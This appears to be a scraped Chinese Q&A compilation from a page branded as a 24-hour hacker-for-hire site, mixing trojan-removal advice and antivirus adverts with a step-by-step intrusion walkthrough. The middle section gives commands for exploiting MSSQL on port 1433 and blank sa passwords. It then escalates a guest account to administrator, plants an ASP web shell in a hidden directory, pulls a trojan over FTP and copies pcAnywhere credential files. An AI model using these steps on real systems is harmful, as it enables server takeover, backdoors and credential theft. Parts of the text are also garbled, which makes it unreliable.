今天分享{黑客24小时在线接单网站}的知识,会对关于木马病毒解释,如果解决了您的问题可以收藏本站。
木马的工作流程
您好:
木马病毒的工作流畅一般分为以下几步:
1、通过下载文件、安装软件等途径入侵电脑。
2、修改系统文件并后台运行。
3、远程木马病毒IP上线
4、远程主控端连接上线,然后就可以后台远程控制、监控中毒的电脑和达到下载上传文件等目的了。
如果您的电脑中了木马病毒的话,为了您电脑的安全,建议您使用腾讯电脑管家的闪电杀毒功能对您的电脑杀毒,腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件,杀毒能力很强大,是完全可以帮助您查杀干净电脑中的病毒的,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:
木马病毒如何获取ip地址
反弹木马一般是指向一个固定的动态域名比如说 ****.3322.org
然后种马者去登陆那个域名你把这个域名指向自己的ip
也就是说
肉鸡-域名-种马者
想定位那个黑客的ip是非常困难的
盗传奇密码的木马病毒是怎么侵入电脑的?
分类: 电脑/网络 反病毒
问题描述:
我用江民杀毒 时时监控 打开了放火墙
用专门杀这病毒的软件也杀了不少!
可每次还是会侵入电脑,是什么途径进入电脑的?
怎么彻底杀完?
最关键的是怎么才能防止它侵入我电脑?
就因为这病毒我都从做过2次系统了!
病毒一出现征兆就是我的电脑的声卡驱动就失灵了
帮帮忙啊!高手
解析:
可以通过1433和3389的端口,请关闭他们.还有可能你中了免杀的远程控制工具.1433这样入侵
在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exesandflee都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:pinxxxxx就可以看到了。自己的ip呢?在cmd下c:ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\winnt\system32.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。 user guest /active:yes用这个命令,就将默认禁止的guest用户激活。 user guest 123456这样guest的密码变成123456了。 localgroup administrators guest /add这就是guest成为最高权限的管理员了。
第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东sandflee也有下。看看入侵方法,我以前在小榕论坛贴的:lcx的win98下sa空密码入侵脚本20步
1.如何找到sa空密码肉鸡?自己用流光扫吧。
2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。
3.工具:supersqlexec.exe、cmd.asp(sandflee有下)海阳顶端网木马(黑白)放在本机f:盘
4.用supersqlexec联接成功。在命令行中输入:
user guest /active:yes
(指肉鸡回显下同)The mand pleted successfully.
user guest 123456
The mand pleted successfully
localgroup administrators guest /add
The mand pleted successfully.
这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。
5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以,是这样的,看这里)。
6.换个用户名吧。回到supersqlexe.exe的命令模式 user lcx 123456 /add,命令失败。服务器没开 ipc$?
7.回到sqlexe命令行中 start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思 不得其解。(注: start命令列表) 我后来换wn2000的cmd下 use \\ip\ipc$ "123456" /user:"guest"也不能联接成功。
8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
9.回到sqlexe命令行中 use x: \\本机ip\f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器 显示命令成功完成。(lcx注:命令的详细用法)
10.sqlexe命令行中运行set得知其主页位置在d:\ipub\root。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir */s查找其主页位置。
11.sqlexe命令行中copy x:\cmd.asp d:\ipub\root,这个目录是肉鸡网站的目录。
12.回到ie中服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。
md d:\ipub\root\aspmm
13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\ipub\root\aspmm\.再将目录隐藏
attrib +h d:\ipub\root\aspmm
14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。
15.在自己本机上建立up.txt内容如下:
open ftp1.go.163(说明:这里是指我用得是网易ftp)
username(说明:你的上传用户名)
password(说明:密码)
get lcx.exe(说明:你要上传到肉鸡的文件名)
bye(说明:退出ftp)
通过映射copy到肉鸡的c:\up.txt
16.sqlexec命令行中ftp -s:c:\up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在\winnt\system32\下了。
17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节
18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?
19.通过一天的dos8.3规则的补习才知应是这样 :
copy c:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\ipub\root\.然后通过 ie下载。其实,也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明:
s8s8/cgi-bin/topic.cgi?forum=26topic=741
20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。
其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.
echo 你要写的 up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行。还有3389,他可以远程查看你的桌面.china/neork/2/2005/close-port-11325344601870.s
你还要看看一些可疑进程.
怎样随时检测到病毒攻击者的ip地址?
首先 他们攻击你 应该是采用了伪装网关的方法 使你机器收到大量垃圾包
理论上 数台机器来用比较大的数据包来ping某一个IP 是的确可以做到 把此IP ping断网的
对方 同时伪装网关 来使你的机器 错误的读取网关地址 使你间歇性断网 你的现象来看 不是同网段某用户中了ARP病毒对你造成的影响
很有可能如你所说 是某人有针对的攻击你
要找到对方的话 用你服务器 运行 CMD 输入 ARP -A 看看你的历史网关记录
除了真实网关 其他的都是攻击者 也可以用AntiARP 来检测和拦截
AntiARP 以及其他类似软件 虽然可以拦截住攻击 但是你的网络会被大量垃圾包所占据 依然会影响你的网速 只是影响会小很多而已
你要做的1是拦截 2是用上述方法找到攻击者 想办法根除
希望对你有所帮助
本机发现被中木马如何查到木马控制端IP
中了病毒、木马不要着急,我来帮你:
这里的方法是总结的前辈们的经验,在此感谢他们!!!!!
其实中毒后的处理方法就是那么几种,但是借助杀毒软件用手工方法处理是最为有效的!!!!
木马的查杀,可以采用自动和手动两种方式。最简单的删除木马的方法是安装杀毒软件(自动),现在很多杀毒软件能删除网络最猖獗的木马,建议安装金山毒霸或安全之星XP,它们在查杀木马方面很有一套!
由于杀毒软件的升级多数情况下慢于木马的出现,因此学会手工查杀非常必要。方法是:
1.)检查注册表
看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curren Version和HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下,所有以“Run”开头的键值名,其下有没有可疑的文件名。如果有,就需要删除相应的键值,再删除相应的应用程序。
2.)检查启动组
木马们如果隐藏在启动组虽然不是十分隐蔽,但这里的确是自动加载运行的好场所,因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为:C:\windows\start menu\programs\startup,在注册表中的位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders Startup="C:\windows\start menu\programs\startup"。要注意经常检查这两个地方哦!
3.)Win.ini以及System.ini也是木马们喜欢的隐蔽场所,要注意这些地方
比方说,Win.ini的[Windows]小节下的load和run后面在正常情况下是没有跟什么程序的,如果有了那就要小心了,看看是什么;在System.ini的[boot]小节的Shell=Explorer.exe后面也是加载木马的好场所,因此也要注意这里了。当你看到变成这样:Shell=Explorer.exe wind0ws.exe,请注意那个wind0ws.exe很有可能就是木马服务端程序!赶快检查吧。
4.)对于下面所列文件也要勤加检查,木马们也很可能隐藏在那里
C:\windows\winstart.bat、C:\windows\wininit.ini、Autoexec.bat。
5.)如果是EXE文件启动,那么运行这个程序,看木马是否被装入内存,端口是否打开。如果是的话,则说明要么是该文件启动木马程序,要么是该文件捆绑了木马程序,只好再找一个这样的程序,重新安装一下了。
6.)万变不离其宗,木马启动都有一个方式,它只是在一个特定的情况下启动
所以,平时多注意一下你的端口,查看一下正在运行的程序,用此来监测大部分木马应该没问题的。
另外,你也可以试试用下面的办法来解决:
从网上下一个叫“冰刃”的软件。这是一个绿色免安装的小软件,可以放心使用。
这个是下载地址。
这个是它的详细用法。
一般来说,不管是木马、病毒进入我们的机器后都是“三隐”的即隐进程、隐服务、隐文件的,利害的能将杀毒软件有实时监控给杀死!但在这个冰刃里,它是无法遁身的。开启的非法进程会以红色显示出来。
至于杀毒软件,应该说各人有各人的喜好,下面给出的链接上你看看比较一下:
六款主流杀毒软件横向评测
消费者该如何选择?六款杀毒软件横向评测(这个要详细些)
怎样才能查出ARP病毒所在的IP
您好
1,您可以到腾讯电脑管家官网下载一个电脑管家。
2,然后打开电脑管家——工具箱——ARP防火墙打开。
3,这样就可以拦截ARP攻击了,然后您还可以看拦截记录,就能找到发出ARP攻击的IP地址和MAC地址了。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
木马病毒怎么获得ip的介绍到这里结束,感谢您的关注,关于木马病毒、木马病毒怎么获得ip的信息别忘了在本站进行查找喔。